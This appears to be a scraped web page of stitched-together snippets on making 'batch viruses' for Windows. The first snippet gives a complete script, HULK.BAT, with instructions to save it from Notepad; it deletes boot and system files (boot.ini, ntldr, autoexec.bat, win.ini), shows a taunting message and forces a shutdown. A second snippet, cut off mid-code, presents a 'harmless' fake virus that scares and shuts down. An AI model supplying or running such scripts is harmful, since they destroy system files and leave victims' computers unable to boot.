How to make batch virus with bat extension
BATCH VIRUS VIRUS THAT CRASHESH ANY PC IN ONE SECOND WRITE FOLLOWING COMMANDS IN NOTEPAD AND THEN SAVE NOTEPAD AS HULK.BAT @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini @echo off msg * YOU GOT OWNED!!! shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drive save as bat file in notepad!! This will pop up a message saying OWNED!! and shut [...] Simple Fake-Virus Understand the following: It's just a harmless "virus". It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before! Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does. @echo off title %0 rem conditional check. echo welcome to this wonde...